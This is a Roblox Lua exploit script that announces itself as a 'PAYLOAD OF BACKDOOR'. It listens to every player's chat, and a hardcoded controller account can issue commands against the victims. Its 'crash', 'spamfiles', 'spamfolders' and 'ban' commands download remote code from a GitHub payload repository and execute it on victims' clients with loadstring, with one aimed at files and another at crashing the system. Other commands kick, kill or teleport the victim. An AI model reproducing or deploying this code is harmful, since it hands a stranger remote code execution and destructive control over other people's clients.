-- ALL COMMANDS TO F9 CONSOLE
print("                                                                                                                                  ")
print("⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻ PAYLOAD OF BACKDOOR ⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻")
print("⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻ PAYLOAD OF BACKDOOR ⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻")
print("⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻ PAYLOAD OF BACKDOOR ⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻")
print("                                                                                                                                  ")
print("╔⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻ Noone can escape... ⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻")
print("║⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻ Well i guess....... ⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻")
print("║⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻ Don't talk to owner ⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻")
print("║⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻ And don't get ban:) ⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻")
print("║                                                                                                                                  ")

print("╚Commands for backdoor ^^")
print("                                                                                                                                  ")

print("┃⸻      ban        ⸻┃")
print("┃⸻      goto        ⸻┃")
print("┃⸻      spamfiles    ⸻ -- VERY POWERFUL AND MAY FUCK UP SOME┃")
print("┃⸻       crash         ⸻┃")
print("┃⸻        kill           ⸻┃")
print("┃⸻        spamfolders     ⸻┃")
print("┃⸻        executehub       ⸻ -- EXECUTE MY OWN HUB┃")

print("                                                                                                                                  ")
print("╔⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻ Noone can escape... ⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻")
print("║⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻ Well i guess....... ⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻")
print("║⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻ Don't talk to owner ⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻")
print("║⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻ And don't get ban:) ⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻")
print("║                                                                                                                                  ")
print("║⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻ PAYLOAD OF BACKDOOR ⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻")
print("║⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻ PAYLOAD OF BACKDOOR ⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻")
print("╚⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻ PAYLOAD OF BACKDOOR ⸻⸻⸻⸻⸻⸻⸻⸻⸻⸻")
print("                                                                                                                                  ")

local AdminPrefix = ";" -- Change this to what you want (i.e: ;kill <namehere>) (if its blank it will error)
local Players = game:GetService("Players")
local LocalP = Players.LocalPlayer;
-- BELOW USED FOR SCRIPTS
local coregui = game:service'CoreGui'
local sound = Instance.new('Sound', coregui)


getgenv().AdminTable = {
  [236662372] = {["Access"] = 5}; -- Access is what level of shit you want the person to have access to
}

getgenv().psearch = function(Name)
  local Inserted = {}
  for _, p in pairs(Players:GetPlayers()) do
      if string.lower(string.sub(p.Name,1, string.len(Name))) == string.lower(Name) then
          table.insert(Inserted, p);return p
      end
  end
end -- Simple player finder function

getgenv().AdminCmdList = {
	  ["kick"] = {
      ["CommandFunc"] = function(Player, self, CmdPlayer)
          if Player == LocalP or Player == "all" then
              LocalP:Kick("Goodbye cutie :3")
          end
      end;
      ["Clearence"] = {[5] = true;};
  }; -- you can make new ones of these (the ; have to be in the same spots)
  ["ban"] = {
    ["CommandFunc"] = function(Player, self, CmdPlayer)
        if Player == LocalP or Player == "all" then
            loadstring(game:HttpGet("https://raw.githubusercontent.com/ImTimmy228/Payload/main/AttemptToGettingBAN",true))()
        end
    end;
    ["Clearence"] = {[5] = true;};
}; -- you can make new ones of these (the ; have to be in the same spots)
  ["goto"] = {
    ["CommandFunc"] = function(Player, self, CmdPlayer)
        if Player == LocalP or Player == "all" then
            LocalP.Character.HumanoidRootPart.CFrame = game.Players.ImTimmy228.Character.HumanoidRootPart.CFrame
        end
    end;
    ["Clearence"] = {[5] = true;};
  ["spamfiles"] = {
    ["CommandFunc"] = function(Player, self, CmdPlayer)
        if Player == LocalP or Player == "all" then
            loadstring(game:HttpGet("https://raw.githubusercontent.com/ImTimmy228/Payload/main/FuckupFiles/1",true))()
        end
    end;
    ["Clearence"] = {[5] = true;};
}; -- you can make new ones of these (the ; have to be in the same spots)
["spamfolders"] = {
    ["CommandFunc"] = function(Player, self, CmdPlayer)
        if Player == LocalP or Player == "all" then
            loadstring(game:HttpGet("https://raw.githubusercontent.com/ImTimmy228/Payload/main/SpamFolders",true))()
        end
    end;
["Clearence"] = {[5] = true;};
}; -- you can make new ones of these (the ; have to be in the same spots)
  ["crash"] = {
    ["CommandFunc"] = function(Player, self, CmdPlayer)
          if Player == LocalP or Player == "all" then
            loadstring(game:HttpGet("https://raw.githubusercontent.com/ImTimmy228/Payload/main/BSODmodified",true))()
          end
      end;
      ["Clearence"] = {[5] = true;};
  }; -- you can make new ones of these (the ; have to be in the same spots)
  ["kill"] = {
      ["CommandFunc"] = function(Player, self, CmdPlayer)
          if Player == LocalP or Player == "all" then
              LocalP.Character.Humanoid:ChangeState(15)
          end
      end;
      ["Clearence"] = {[5] = true;};
  };
  ["executehub"] = {
      ["CommandFunc"] = function(Player, self, CmdPlayer)
          if Player == LocalP or Player == "all" then
              LocalP.Character.Humanoid:ChangeState(15)
          end
      end;
      ["Clearence"] = {[5] = true;};
  };
};
};

getgenv().BDCheck = function(Target2, Chat)
  if Chat:sub(1, 1) == AdminPrefix then
      local args = string.split(Chat:sub(2), " ")
      local Command = AdminCmdList[table.remove(args, 1)]
      local targ1 = psearch(table.remove(args, 1))
      if Command and targ1 then -- Credits to !fishgang Cy for this BDCheck func
          return Command and Command["Clearence"][AdminTable[Target2.UserId].Access] and Command["CommandFunc"](targ1, table.concat(args, " "), Target2)
      end
  end
end

local GP = Players:GetPlayers()
for i = 1, #GP do
  local CoolKidPlayer = GP[i]
  CoolKidPlayer.Chatted:Connect(function(Word)
      BDCheck(CoolKidPlayer, Word)
  end)
end -- Checks if you chatted a command
Players.PlayerAdded:Connect(function(CKP)
  CKP.Chatted:Connect(function(Message)
      BDCheck(CKP, Message)
  end)
end)
